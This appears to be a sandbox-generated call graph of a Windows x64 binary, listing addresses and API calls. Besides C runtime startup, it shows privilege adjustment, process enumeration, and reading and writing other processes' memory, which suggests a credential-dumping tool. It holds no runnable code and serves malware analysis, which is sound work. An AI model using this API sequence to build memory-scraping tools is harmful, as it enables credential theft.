7ff73cfc3a80 2 API calls 4048->4049 4050 7ff73cfc3c69 4049->4050 4051 7ff73cfc3c71 StrChrW 4050->4051 4052 7ff73cfc3c8b wsprintfW GetModuleHandleW GetProcAddress 4050->4052 4051->4052 4054 7ff73cfc3d2f 4052->4054 4055 7ff73cfc3d34 LocalFree 4054->4055 4056 7ff73cfc3d3d 4054->4056 4055->4056 4057 7ff73cfc3d42 LocalFree 4056->4057 4058 7ff73cfc3d4b 4056->4058 4057->4058 4058->4037 4059 7ff73cfc3d50 LocalFree 4058->4059 4059->4037 4061 7ff73cfc228a 4060->4061 4062 7ff73cfc22da 4060->4062 4061->4062 4063 7ff73cfc2290 GetModuleHandleW GetProcAddress 4061->4063 4062->4029 4066 7ff73cfc22f0 4062->4066 4064 7ff73cfc22b8 4063->4064 4064->4062 4065 7ff73cfc1170 11 API calls 4064->4065 4065->4062 4067 7ff73cfc231e IsTextUnicode 4066->4067 4068 7ff73cfc230d IsCharAlphaNumericW 4066->4068 4069 7ff73cfc2334 4067->4069 4068->4067 4068->4069 4069->4029 4071 7ff73cfc3a94 GetModuleHandleW GetProcAddress 4070->4071 4072 7ff73cfc3abf __initmbctable 4070->4072 4071->4072 4072->4046 4081 7ff73cfc3600 4086 7ff73cfc42d8 4081->4086 4083 7ff73cfc365d 4084 7ff73cfc42d8 62 API calls 4083->4084 4085 7ff73cfc3698 __initmbctable 4084->4085 4087 7ff73cfc4355 4086->4087 4088 7ff73cfc42eb 4086->4088 4089 7ff73cfc5798 _errno 62 API calls 4088->4089 4093 7ff73cfc430f 4088->4093 4090 7ff73cfc42f5 4089->4090 4091 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 4090->4091 4092 7ff73cfc4300 4091->4092 4092->4083 4093->4083 4094 7ff73cfc91ff 4095 7ff73cfc9211 4094->4095 4096 7ff73cfc921b 4094->4096 4098 7ff73cfc731c LeaveCriticalSection 4095->4098 2900 7ff73cfc43c4 2902 7ff73cfc43dc 2900->2902 2940 7ff73cfc6a00 HeapCreate 2902->2940 2904 7ff73cfc4447 2945 7ff73cfc53dc 2904->2945 2905 7ff73cfc4433 3026 7ff73cfc5c00 2905->3026 2906 7ff73cfc442e 3017 7ff73cfc5e60 2906->3017 2911 7ff73cfc4472 _RTC_Initialize 2961 7ff73cfc66bc GetStartupInfoW 2911->2961 2913 7ff73cfc4459 2916 7ff73cfc5e60 _FF_MSGBANNER 62 API calls 2913->2916 2914 7ff73cfc445e 2917 7ff73cfc5c00 _FF_MSGBANNER 62 API calls 2914->2917 2916->2914 2918 7ff73cfc4468 2917->2918 2920 7ff73cfc5850 malloc 3 API calls 2918->2920 2920->2911 2922 7ff73cfc448b GetCommandLineW 2974 7ff73cfc6634 GetEnvironmentStringsW 2922->2974 2928 7ff73cfc44b7 2987 7ff73cfc6274 2928->2987 2929 7ff73cfc5bac _amsg_exit 62 API calls 2929->2928 2932 7ff73cfc44ca 3001 7ff73cfc5934 2932->3001 2933 7ff73cfc5bac _amsg_exit 62 API calls 2933->2932 2935 7ff73cfc44d4 2936 7ff73cfc44df 2935->2936 2938 7ff73cfc5bac _amsg_exit 62 API calls 2935->2938 3007 7ff73cfc245c 2936->3007 2938->2936 2939 7ff73cfc44ff 2941 7ff73cfc4421 2940->2941 2942 7ff73cfc6a28 GetVersion 2940->2942 2941->2904 2941->2905 2941->2906 2943 7ff73cfc6a32 HeapSetInformation 2942->2943 2944 7ff73cfc6a4c 2942->2944 2943->2944 2944->2941 3073 7ff73cfc5880 2945->3073 2947 7ff73cfc53e7 3077 7ff73cfc7210 2947->3077 2950 7ff73cfc5450 3095 7ff73cfc5120 2950->3095 2951 7ff73cfc53f0 FlsAlloc 2951->2950 2953 7ff73cfc5408 2951->2953 3081 7ff73cfc7520 2953->3081 2957 7ff73cfc541f FlsSetValue 2957->2950 2958 7ff73cfc5432 2957->2958 3086 7ff73cfc5148 2958->3086 2962 7ff73cfc7520 __onexitinit 62 API calls 2961->2962 2973 7ff73cfc66f2 2962->2973 2963 7ff73cfc447d 2963->2922 3066 7ff73cfc5bac 2963->3066 2964 7ff73cfc68c9 GetStdHandle 2969 7ff73cfc68a4 2964->2969 2965 7ff73cfc68f9 GetFileType 2965->2969 2966 7ff73cfc7520 __onexitinit 62 API calls 2966->2973 2967 7ff73cfc6819 2967->2969 2971 7ff73cfc6852 InitializeCriticalSectionAndSpinCount 2967->2971 2972 7ff73cfc6844 GetFileType 2967->2972 2968 7ff73cfc6962 SetHandleCount 2968->2963 2969->2964 2969->2965 2969->2968 2970 7ff73cfc6923 InitializeCriticalSectionAndSpinCount 2969->2970 2970->2963 2970->2969 2971->2963 2971->2967 2972->2967 2972->2971 2973->2963 2973->2966 2973->2967 2973->2969 2973->2973 2975 7ff73cfc449d 2974->2975 2976 7ff73cfc6658 2974->2976 2981 7ff73cfc6544 GetModuleFileNameW 2975->2981 2978 7ff73cfc74a0 __wsetargv 62 API calls 2976->2978 2979 7ff73cfc667f __initmbctable 2978->2979 2980 7ff73cfc6698 FreeEnvironmentStringsW 2979->2980 2980->2975 2982 7ff73cfc6584 __wsetargv 2981->2982 2983 7ff73cfc44a9 2982->2983 2984 7ff73cfc65df 2982->2984 2983->2928 2983->2929 2985 7ff73cfc74a0 __wsetargv 62 API calls 2984->2985 2986 7ff73cfc65e4 __wsetargv 2985->2986 2986->2983 2988 7ff73cfc44bc 2987->2988 2989 7ff73cfc62a7 _FF_MSGBANNER 2987->2989 2988->2932 2988->2933 2990 7ff73cfc7520 __onexitinit 62 API calls 2989->2990 2997 7ff73cfc62d4 _FF_MSGBANNER 2990->2997 2991 7ff73cfc633c 2992 7ff73cfc7460 _freefls 62 API calls 2991->2992 2992->2988 2993 7ff73cfc7520 __onexitinit 62 API calls 2993->2997 2994 7ff73cfc6391 2995 7ff73cfc7460 _freefls 62 API calls 2994->2995 2995->2988 2997->2988 2997->2991 2997->2993 2997->2994 2998 7ff73cfc637c 2997->2998 3187 7ff73cfc8bb0 2997->3187 3196 7ff73cfc568c 2998->3196 3002 7ff73cfc594a _cinit 3001->3002 3230 7ff73cfc8734 3002->3230 3004 7ff73cfc5967 _initterm_e 3006 7ff73cfc598a _cinit 3004->3006 3233 7ff73cfc871c 3004->3233 3006->2935 3008 7ff73cfc2475 RtlGetNtVersionNumbers RtlAdjustPrivilege 3007->3008 3009 7ff73cfc2465 3007->3009 3011 7ff73cfc24b3 3008->3011 3012 7ff73cfc24f1 3008->3012 3250 7ff73cfc2348 GetProcessHeap HeapAlloc 3009->3250 3259 7ff73cfc36d8 3011->3259 3015 7ff73cfc250f 3012->3015 3016 7ff73cfc2509 CloseHandle 3012->3016 3015->2939 3016->3015 3453 7ff73cfc8c1c 3017->3453 3020 7ff73cfc8c1c _set_error_mode 62 API calls 3022 7ff73cfc5e7d 3020->3022 3021 7ff73cfc5c00 _FF_MSGBANNER 62 API calls 3023 7ff73cfc5e94 3021->3023 3022->3021 3024 7ff73cfc5e9e 3022->3024 3025 7ff73cfc5c00 _FF_MSGBANNER 62 API calls 3023->3025 3024->2905 3025->3024 3027 7ff73cfc5c34 _FF_MSGBANNER 3026->3027 3029 7ff73cfc8c1c _set_error_mode 59 API calls 3027->3029 3062 7ff73cfc5d86 3027->3062 3028 7ff73cfc71f0 _FF_MSGBANNER 8 API calls 3031 7ff73cfc443d 3028->3031 3030 7ff73cfc5c4a 3029->3030 3032 7ff73cfc5dc8 GetStdHandle 3030->3032 3033 7ff73cfc8c1c _set_error_mode 59 API calls 3030->3033 3063 7ff73cfc5850 3031->3063 3035 7ff73cfc5ddb _FF_MSGBANNER 3032->3035 3032->3062 3034 7ff73cfc5c5b 3033->3034 3034->3032 3036 7ff73cfc8bb0 _FF_MSGBANNER 59 API calls 3034->3036 3034->3062 3037 7ff73cfc5e15 WriteFile 3035->3037 3035->3062 3038 7ff73cfc5c97 3036->3038 3037->3062 3039 7ff73cfc5ca1 GetModuleFileNameW 3038->3039 3056 7ff73cfc5db4 3038->3056 3040 7ff73cfc5cc7 3039->3040 3046 7ff73cfc5cf0 _FF_MSGBANNER 3039->3046 3042 7ff73cfc8bb0 _FF_MSGBANNER 59 API calls 3040->3042 3041 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3043 7ff73cfc5dc7 3041->3043 3045 7ff73cfc5cd8 3042->3045 3043->3032 3044 7ff73cfc5d48 3468 7ff73cfc8a3c 3044->3468 3045->3046 3048 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3045->3048 3046->3044 3459 7ff73cfc8ac4 3046->3459 3048->3046 3051 7ff73cfc5d9f 3053 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3051->3053 3053->3056 3054 7ff73cfc8a3c _FF_MSGBANNER 59 API calls 3055 7ff73cfc5d6d 3054->3055 3057 7ff73cfc5d71 3055->3057 3058 7ff73cfc5d8b 3055->3058 3056->3041 3477 7ff73cfc8834 3057->3477 3061 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3058->3061 3059 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3059->3044 3061->3051 3062->3028 3496 7ff73cfc5814 GetModuleHandleW 3063->3496 3067 7ff73cfc5e60 _FF_MSGBANNER 62 API calls 3066->3067 3068 7ff73cfc5bb9 3067->3068 3069 7ff73cfc5c00 _FF_MSGBANNER 62 API calls 3068->3069 3070 7ff73cfc5bc0 3069->3070 3500 7ff73cfc59e4 3070->3500 3103 7ff73cfc5114 EncodePointer 3073->3103 3075 7ff73cfc588b _initp_misc_winsig 3076 7ff73cfc82fc EncodePointer 3075->3076 3076->2947 3078 7ff73cfc7233 3077->3078 3079 7ff73cfc7239 InitializeCriticalSectionAndSpinCount 3078->3079 3080 7ff73cfc53ec 3078->3080 3079->3078 3079->3080 3080->2950 3080->2951 3084 7ff73cfc7545 3081->3084 3083 7ff73cfc5417 3083->2950 3083->2957 3084->3083 3085 7ff73cfc7563 Sleep 3084->3085 3104 7ff73cfc8f3c 3084->3104 3085->3083 3085->3084 3135 7ff73cfc741c 3086->3135 3096 7ff73cfc512f FlsFree 3095->3096 3097 7ff73cfc513c 3095->3097 3096->3097 3098 7ff73cfc72c4 DeleteCriticalSection 3097->3098 3099 7ff73cfc72e2 3097->3099 3100 7ff73cfc7460 _freefls 62 API calls 3098->3100 3101 7ff73cfc444c 3099->3101 3102 7ff73cfc72f7 DeleteCriticalSection 3099->3102 3100->3097 3101->2911 3101->2913 3101->2914 3102->3099 3105 7ff73cfc8f51 3104->3105 3107 7ff73cfc8f6e 3104->3107 3106 7ff73cfc8f5f 3105->3106 3105->3107 3112 7ff73cfc5798 3106->3112 3108 7ff73cfc8f86 HeapAlloc 3107->3108 3110 7ff73cfc8f64 3107->3110 3115 7ff73cfc8598 DecodePointer 3107->3115 3108->3107 3108->3110 3110->3084 3117 7ff73cfc5200 GetLastError FlsGetValue 3112->3117 3114 7ff73cfc57a1 3114->3110 3116 7ff73cfc85b3 3115->3116 3116->3107 3118 7ff73cfc5226 3117->3118 3119 7ff73cfc526e SetLastError 3117->3119 3120 7ff73cfc7520 __onexitinit 57 API calls 3118->3120 3119->3114 3121 7ff73cfc5233 3120->3121 3121->3119 3122 7ff73cfc523b FlsSetValue 3121->3122 3123 7ff73cfc5251 3122->3123 3124 7ff73cfc5267 3122->3124 3125 7ff73cfc5148 _getptd 57 API calls 3123->3125 3129 7ff73cfc7460 3124->3129 3127 7ff73cfc5258 GetCurrentThreadId 3125->3127 3127->3119 3128 7ff73cfc526c 3128->3119 3130 7ff73cfc7465 HeapFree 3129->3130 3134 7ff73cfc7495 realloc 3129->3134 3131 7ff73cfc7480 3130->3131 3130->3134 3132 7ff73cfc5798 _errno 60 API calls 3131->3132 3133 7ff73cfc7485 GetLastError 3132->3133 3133->3134 3134->3128 3136 7ff73cfc743a 3135->3136 3137 7ff73cfc744b EnterCriticalSection 3135->3137 3141 7ff73cfc7334 3136->3141 3140 7ff73cfc5bac _amsg_exit 61 API calls 3140->3137 3142 7ff73cfc7372 3141->3142 3143 7ff73cfc735b 3141->3143 3155 7ff73cfc7387 3142->3155 3166 7ff73cfc74a0 3142->3166 3144 7ff73cfc5e60 _FF_MSGBANNER 60 API calls 3143->3144 3145 7ff73cfc7360 3144->3145 3147 7ff73cfc5c00 _FF_MSGBANNER 60 API calls 3145->3147 3149 7ff73cfc7368 3147->3149 3152 7ff73cfc5850 malloc 3 API calls 3149->3152 3150 7ff73cfc739d 3153 7ff73cfc5798 _errno 60 API calls 3150->3153 3151 7ff73cfc73ac 3154 7ff73cfc741c _lock 60 API calls 3151->3154 3152->3142 3153->3155 3156 7ff73cfc73b6 3154->3156 3155->3137 3155->3140 3157 7ff73cfc73c2 InitializeCriticalSectionAndSpinCount 3156->3157 3158 7ff73cfc73ef 3156->3158 3159 7ff73cfc73d1 3157->3159 3160 7ff73cfc73de LeaveCriticalSection 3157->3160 3161 7ff73cfc7460 _freefls 60 API calls 3158->3161 3162 7ff73cfc7460 _freefls 60 API calls 3159->3162 3160->3155 3161->3160 3164 7ff73cfc73d9 3162->3164 3165 7ff73cfc5798 _errno 60 API calls 3164->3165 3165->3160 3167 7ff73cfc74c8 3166->3167 3169 7ff73cfc7395 3167->3169 3170 7ff73cfc74dc Sleep 3167->3170 3171 7ff73cfc8cd4 3167->3171 3169->3150 3169->3151 3170->3167 3170->3169 3172 7ff73cfc8d68 3171->3172 3179 7ff73cfc8cec 3171->3179 3173 7ff73cfc8598 _callnewh DecodePointer 3172->3173 3174 7ff73cfc8d6d 3173->3174 3176 7ff73cfc5798 _errno 61 API calls 3174->3176 3175 7ff73cfc8d24 HeapAlloc 3177 7ff73cfc8d5d 3175->3177 3175->3179 3176->3177 3177->3167 3178 7ff73cfc5e60 _FF_MSGBANNER 61 API calls 3178->3179 3179->3175 3179->3178 3180 7ff73cfc8d4d 3179->3180 3181 7ff73cfc5c00 _FF_MSGBANNER 61 API calls 3179->3181 3182 7ff73cfc8598 _callnewh DecodePointer 3179->3182 3184 7ff73cfc8d52 3179->3184 3185 7ff73cfc5850 malloc 3 API calls 3179->3185 3183 7ff73cfc5798 _errno 61 API calls 3180->3183 3181->3179 3182->3179 3183->3184 3186 7ff73cfc5798 _errno 61 API calls 3184->3186 3185->3179 3186->3177 3188 7ff73cfc8bcb 3187->3188 3189 7ff73cfc8bc1 3187->3189 3190 7ff73cfc5798 _errno 62 API calls 3188->3190 3189->3188 3194 7ff73cfc8be8 3189->3194 3191 7ff73cfc8bd4 3190->3191 3199 7ff73cfc5730 3191->3199 3193 7ff73cfc8be0 3193->2997 3194->3193 3195 7ff73cfc5798 _errno 62 API calls 3194->3195 3195->3191 3209 7ff73cfc5540 3196->3209 3202 7ff73cfc56c0 DecodePointer 3199->3202 3201 7ff73cfc5749 3201->3193 3203 7ff73cfc571f 3202->3203 3204 7ff73cfc56fe 3202->3204 3205 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3203->3205 3204->3201 3206 7ff73cfc572e 3205->3206 3207 7ff73cfc56c0 _invalid_parameter_noinfo 16 API calls 3206->3207 3208 7ff73cfc5749 3207->3208 3208->3201 3210 7ff73cfc557a __initmbctable _FF_MSGBANNER 3209->3210 3211 7ff73cfc5596 RtlCaptureContext RtlLookupFunctionEntry 3210->3211 3212 7ff73cfc55cf RtlVirtualUnwind 3211->3212 3213 7ff73cfc5606 3211->3213 3214 7ff73cfc5622 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3212->3214 3213->3214 3215 7ff73cfc5654 _FF_MSGBANNER 3214->3215 3218 7ff73cfc71f0 3215->3218 3217 7ff73cfc5673 GetCurrentProcess TerminateProcess 3219 7ff73cfc71f9 3218->3219 3220 7ff73cfc7204 3219->3220 3221 7ff73cfc8df0 RtlCaptureContext RtlLookupFunctionEntry 3219->3221 3220->3217 3222 7ff73cfc8e34 RtlVirtualUnwind 3221->3222 3223 7ff73cfc8e75 3221->3223 3224 7ff73cfc8e97 IsDebuggerPresent 3222->3224 3223->3224 3229 7ff73cfc7fa4 3224->3229 3226 7ff73cfc8ef6 SetUnhandledExceptionFilter UnhandledExceptionFilter 3227 7ff73cfc8f14 _FF_MSGBANNER 3226->3227 3228 7ff73cfc8f1e GetCurrentProcess TerminateProcess 3226->3228 3227->3228 3228->3217 3229->3226 3231 7ff73cfc874a EncodePointer 3230->3231 3231->3231 3232 7ff73cfc875f 3231->3232 3232->3004 3236 7ff73cfc8610 3233->3236 3249 7ff73cfc5868 3236->3249 3251 7ff73cfc23a0 InitializeSecurityDescriptor 3250->3251 3252 7ff73cfc2449 3250->3252 3251->3252 3253 7ff73cfc23b4 SetSecurityDescriptorDacl 3251->3253 3252->3008 3253->3252 3254 7ff73cfc23cc CreateFileW 3253->3254 3254->3252 3255 7ff73cfc2400 GetModuleHandleW GetProcAddress 3254->3255 3256 7ff73cfc241f 3255->3256 3256->3252 3256->3254 3257 7ff73cfc2426 Sleep 3256->3257 3258 7ff73cfc2433 WaitNamedPipeW 3256->3258 3257->3256 3258->3252 3258->3256 3276 7ff73cfc326c 3259->3276 3261 7ff73cfc3a63 3261->3012 3263 7ff73cfc37f1 3263->3261 3272 7ff73cfc37fc 3263->3272 3265 7ff73cfc3803 GetModuleHandleW GetProcAddress 3265->3272 3266 7ff73cfc1170 11 API calls 3266->3272 3267 7ff73cfc3a5f 3267->3261 3268 7ff73cfc3a4a LocalFree 3268->3272 3269 7ff73cfc224c 13 API calls 3269->3272 3270 7ff73cfc398b GetModuleHandleW GetProcAddress 3270->3272 3271 7ff73cfc39f8 LocalFree 3271->3272 3272->3265 3272->3266 3272->3267 3272->3268 3272->3269 3272->3270 3272->3271 3273 7ff73cfc3a0b LocalFree 3272->3273 3274 7ff73cfc3a1e LocalFree 3272->3274 3275 7ff73cfc3a2d LocalFree 3272->3275 3273->3272 3274->3272 3275->3272 3277 7ff73cfc32d4 3276->3277 3278 7ff73cfc35eb 3276->3278 3320 7ff73cfc2a34 3277->3320 3278->3261 3278->3263 3302 7ff73cfc1170 3278->3302 3280 7ff73cfc3325 RtlInitUnicodeString 3328 7ff73cfc1864 3280->3328 3281 7ff73cfc32f9 CreateFileW 3282 7ff73cfc33ac 3281->3282 3285 7ff73cfc3557 3282->3285 3335 7ff73cfc1000 GetModuleHandleW GetProcAddress 3282->3335 3284 7ff73cfc335e 3284->3285 3291 7ff73cfc338b LocalFree 3284->3291 3398 7ff73cfc1920 RtlEqualUnicodeString 3284->3398 3285->3278 3286 7ff73cfc35d8 CloseHandle 3285->3286 3288 7ff73cfc35c2 LocalFree 3285->3288 3290 7ff73cfc35cc LocalFree 3285->3290 3292 7ff73cfc358e 3285->3292 3294 7ff73cfc35b4 3285->3294 3295 7ff73cfc35ae UnmapViewOfFile 3285->3295 3286->3278 3288->3290 3290->3286 3291->3285 3293 7ff73cfc339d OpenProcess 3291->3293 3292->3288 3292->3290 3293->3282 3294->3288 3296 7ff73cfc35b9 CloseHandle 3294->3296 3295->3294 3296->3288 3297 7ff73cfc33d7 3297->3285 3348 7ff73cfc196c 3297->3348 3303 7ff73cfc11aa 3302->3303 3312 7ff73cfc12bb 3302->3312 3304 7ff73cfc122a 3303->3304 3305 7ff73cfc11ae 3303->3305 3309 7ff73cfc1232 WriteProcessMemory 3304->3309 3310 7ff73cfc1250 GetModuleHandleW GetProcAddress 3304->3310 3306 7ff73cfc1223 __initmbctable 3305->3306 3307 7ff73cfc11b7 3305->3307 3306->3263 3307->3310 3311 7ff73cfc11c3 3307->3311 3308 7ff73cfc133d ReadProcessMemory 3308->3306 3309->3306 3318 7ff73cfc1277 3310->3318 3314 7ff73cfc11c9 SetFilePointer 3311->3314 3315 7ff73cfc11e7 GetModuleHandleW GetProcAddress 3311->3315 3312->3306 3312->3308 3313 7ff73cfc1322 3312->3313 3316 7ff73cfc12da SetFilePointer 3312->3316 3313->3308 3314->3306 3314->3315 3315->3306 3316->3306 3317 7ff73cfc12f4 GetModuleHandleW GetProcAddress 3316->3317 3317->3313 3318->3306 3319 7ff73cfc12ab LocalFree 3318->3319 3319->3306 3321 7ff73cfc2ad1 3320->3321 3327 7ff73cfc2c3a 3320->3327 3322 7ff73cfc2ade GetModuleHandleW GetProcAddress LoadLibraryExW 3321->3322 3325 7ff73cfc2bea 3321->3325 3323 7ff73cfc2b11 8 API calls 3322->3323 3322->3327 3324 7ff73cfc2be8 3323->3324 3323->3325 3324->3327 3325->3327 3400 7ff73cfc2ce8 3325->3400 3327->3278 3327->3280 3327->3281 3329 7ff73cfc1890 NtQuerySystemInformation 3328->3329 3333 7ff73cfc18a0 3328->3333 3330 7ff73cfc1900 3329->3330 3330->3284 3331 7ff73cfc18a5 GetModuleHandleW GetProcAddress LocalAlloc 3331->3330 3332 7ff73cfc18d4 NtQuerySystemInformation 3331->3332 3332->3333 3334 7ff73cfc18ec LocalFree 3332->3334 3333->3330 3333->3331 3334->3333 3336 7ff73cfc1056 3335->3336 3337 7ff73cfc1074 3336->3337 3338 7ff73cfc110c GetModuleHandleW GetProcAddress 3336->3338 3339 7ff73cfc10b1 3336->3339 3346 7ff73cfc10b7 3336->3346 3341 7ff73cfc1078 3337->3341 3342 7ff73cfc10cb GetModuleHandleW GetProcAddress 3337->3342 3343 7ff73cfc10a4 3338->3343 3340 7ff73cfc1143 LocalFree 3339->3340 3339->3346 3340->3346 3341->3340 3344 7ff73cfc1085 GetModuleHandleW GetProcAddress 3341->3344 3345 7ff73cfc10ea 3342->3345 3343->3339 3344->3343 3345->3340 3407 7ff73cfc1534 GetModuleHandleW GetProcAddress 3345->3407 3346->3297 3349 7ff73cfc1e78 3348->3349 3350 7ff73cfc19d7 3348->3350 3351 7ff73cfc214c 14 API calls 3349->3351 3352 7ff73cfc19df 3350->3352 3353 7ff73cfc1bd8 3350->3353 3365 7ff73cfc1e87 3351->3365 3355 7ff73cfc19e7 3352->3355 3364 7ff73cfc1b3a 3352->3364 3416 7ff73cfc214c 3353->3416 3358 7ff73cfc19eb 3355->3358 3359 7ff73cfc1864 6 API calls 3355->3359 3356 7ff73cfc1bf1 3356->3358 3360 7ff73cfc1170 11 API calls 3356->3360 3357 7ff73cfc1ede 3357->3358 3361 7ff73cfc214c 14 API calls 3357->3361 3358->3285 3390 7ff73cfc3da8 3358->3390 3366 7ff73cfc1a06 3359->3366 3380 7ff73cfc1c23 3360->3380 3362 7ff73cfc1f06 3361->3362 3362->3358 3372 7ff73cfc1f84 18 API calls 3362->3372 3363 7ff73cfc1f84 18 API calls 3363->3365 3364->3358 3369 7ff73cfc1b9f RtlInitUnicodeString 3364->3369 3365->3357 3365->3363 3366->3358 3368 7ff73cfc1a92 GetModuleHandleW GetProcAddress 3366->3368 3373 7ff73cfc1aea RtlInitUnicodeString 3366->3373 3367 7ff73cfc1d27 3367->3358 3371 7ff73cfc214c 14 API calls 3367->3371 3378 7ff73cfc1abe 3368->3378 3374 7ff73cfc1f84 18 API calls 3369->3374 3370 7ff73cfc1170 11 API calls 3370->3380 3375 7ff73cfc1d45 3371->3375 3372->3362 3379 7ff73cfc1b0f LocalFree 3373->3379 3374->3364 3375->3358 3377 7ff73cfc1170 11 API calls 3375->3377 3376 7ff73cfc1c78 GetModuleHandleW GetProcAddress 3376->3380 3384 7ff73cfc1d79 3377->3384 3378->3366 3379->3366 3380->3358 3380->3367 3380->3370 3380->3376 3381 7ff73cfc1d0b LocalFree 3380->3381 3425 7ff73cfc1f84 3380->3425 3381->3380 3383 7ff73cfc1170 11 API calls 3383->3384 3384->3358 3384->3383 3385 7ff73cfc1dc8 GetModuleHandleW GetProcAddress 3384->3385 3389 7ff73cfc1e11 3385->3389 3386 7ff73cfc1170 11 API calls 3386->3389 3387 7ff73cfc1e58 LocalFree 3387->3384 3388 7ff73cfc1f84 18 API calls 3388->3389 3389->3384 3389->3386 3389->3387 3389->3388 3391 7ff73cfc3e02 3390->3391 3397 7ff73cfc3ec5 3390->3397 3391->3397 3440 7ff73cfc1380 3391->3440 3393 7ff73cfc3e3d 3394 7ff73cfc1170 11 API calls 3393->3394 3393->3397 3395 7ff73cfc3e7a 3394->3395 3396 7ff73cfc1170 11 API calls 3395->3396 3395->3397 3396->3397 3397->3285 3399 7ff73cfc194f 3398->3399 3399->3284 3402 7ff73cfc2d0c 3400->3402 3401 7ff73cfc2e6c 3401->3327 3402->3401 3403 7ff73cfc2d80 GetModuleHandleW GetProcAddress 3402->3403 3404 7ff73cfc2dac 3403->3404 3404->3401 3405 7ff73cfc2e39 GetModuleHandleW GetProcAddress 3404->3405 3406 7ff73cfc2e65 3405->3406 3406->3401 3408 7ff73cfc1570 3407->3408 3409 7ff73cfc157c CreateFileMappingW 3408->3409 3415 7ff73cfc15e8 3408->3415 3410 7ff73cfc15a8 MapViewOfFile 3409->3410 3411 7ff73cfc15ce 3409->3411 3410->3411 3412 7ff73cfc1601 3411->3412 3413 7ff73cfc15fb UnmapViewOfFile 3411->3413 3411->3415 3414 7ff73cfc1609 CloseHandle 3412->3414 3412->3415 3413->3412 3414->3415 3415->3343 3417 7ff73cfc2181 GetCurrentProcess 3416->3417 3418 7ff73cfc2178 3416->3418 3417->3418 3419 7ff73cfc21cd 3418->3419 3420 7ff73cfc21d1 NtQueryInformationProcess 3418->3420 3421 7ff73cfc2231 RtlGetCurrentPeb 3418->3421 3419->3420 3424 7ff73cfc220c __initmbctable 3419->3424 3422 7ff73cfc21ea 3420->3422 3420->3424 3421->3424 3423 7ff73cfc1170 11 API calls 3422->3423 3422->3424 3423->3424 3424->3356 3426 7ff73cfc1170 11 API calls 3425->3426 3427 7ff73cfc1fdb 3426->3427 3428 7ff73cfc20d1 3427->3428 3429 7ff73cfc1ff2 GetModuleHandleW GetProcAddress 3427->3429 3428->3380 3430 7ff73cfc2024 3429->3430 3430->3428 3431 7ff73cfc1170 11 API calls 3430->3431 3432 7ff73cfc2041 GetModuleHandleW GetProcAddress 3431->3432 3433 7ff73cfc207f 3432->3433 3435 7ff73cfc1170 11 API calls 3433->3435 3439 7ff73cfc209e LocalFree 3433->3439 3437 7ff73cfc2098 3435->3437 3436 7ff73cfc20c0 LocalFree 3436->3428 3438 7ff73cfc20a4 LocalFree 3437->3438 3437->3439 3438->3439 3439->3428 3439->3436 3441 7ff73cfc13dc 3440->3441 3446 7ff73cfc13fb 3440->3446 3442 7ff73cfc145e GetModuleHandleW GetProcAddress LocalAlloc 3441->3442 3444 7ff73cfc13f2 3441->3444 3441->3446 3448 7ff73cfc141f 3441->3448 3443 7ff73cfc1493 3442->3443 3442->3446 3445 7ff73cfc1170 11 API calls 3443->3445 3444->3442 3444->3446 3447 7ff73cfc14a3 3445->3447 3446->3393 3449 7ff73cfc1380 11 API calls 3447->3449 3452 7ff73cfc14bb LocalFree 3447->3452 3448->3446 3451 7ff73cfc1380 11 API calls 3448->3451 3449->3452 3451->3446 3452->3446 3454 7ff73cfc8c24 3453->3454 3455 7ff73cfc5e6e 3454->3455 3456 7ff73cfc5798 _errno 62 API calls 3454->3456 3455->3020 3455->3022 3457 7ff73cfc8c49 3456->3457 3458 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 3457->3458 3458->3455 3463 7ff73cfc8ad4 3459->3463 3460 7ff73cfc8ad9 3461 7ff73cfc5798 _errno 62 API calls 3460->3461 3462 7ff73cfc5d30 3460->3462 3464 7ff73cfc8b03 3461->3464 3462->3044 3462->3059 3463->3460 3463->3462 3466 7ff73cfc8b17 3463->3466 3465 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 3464->3465 3465->3462 3466->3462 3467 7ff73cfc5798 _errno 62 API calls 3466->3467 3467->3464 3469 7ff73cfc8a57 3468->3469 3471 7ff73cfc8a4d 3468->3471 3470 7ff73cfc5798 _errno 62 API calls 3469->3470 3476 7ff73cfc8a60 3470->3476 3471->3469 3473 7ff73cfc8a8e 3471->3473 3472 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 3474 7ff73cfc5d5b 3472->3474 3473->3474 3475 7ff73cfc5798 _errno 62 API calls 3473->3475 3474->3051 3474->3054 3475->3476 3476->3472 3495 7ff73cfc5114 EncodePointer 3477->3495 3497 7ff73cfc5847 ExitProcess 3496->3497 3498 7ff73cfc582e GetProcAddress 3496->3498 3498->3497 3499 7ff73cfc5843 3498->3499 3499->3497 3501 7ff73cfc741c _lock 56 API calls 3500->3501 3502 7ff73cfc5a12 3501->3502 3504 7ff73cfc5a39 DecodePointer 3502->3504 3507 7ff73cfc5afa _amsg_exit 3502->3507 3503 7ff73cfc5b30 3510 7ff73cfc5b5b 3503->3510 3518 7ff73cfc731c LeaveCriticalSection 3503->3518 3504->3507 3508 7ff73cfc5a57 DecodePointer 3504->3508 3507->3503 3521 7ff73cfc731c LeaveCriticalSection 3507->3521 3516 7ff73cfc5a7c 3508->3516 3509 7ff73cfc5b49 3511 7ff73cfc5814 _amsg_exit GetModuleHandleW GetProcAddress 3509->3511 3513 7ff73cfc5b51 ExitProcess 3511->3513 3514 7ff73cfc5a9b DecodePointer 3520 7ff73cfc5114 EncodePointer 3514->3520 3516->3507 3516->3514 3517 7ff73cfc5ab1 DecodePointer DecodePointer 3516->3517 3519 7ff73cfc5114 EncodePointer 3516->3519 3517->3516 4104 7ff73cfc57b8 4105 7ff73cfc57f1 4104->4105 4106 7ff73cfc57c7 4104->4106 4106->4105 4108 7ff73cfc82d8 4106->4108 4109 7ff73cfc5284 _getptd 62 API calls 4108->4109 4110 7ff73cfc82e1 4109->4110 4113 7ff73cfc90cc 4110->4113 4120 7ff73cfc833c DecodePointer 4113->4120 4121 7ff73cfc453c 4124 7ff73cfc6a58 4121->4124 4125 7ff73cfc6a8a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4124->4125 4126 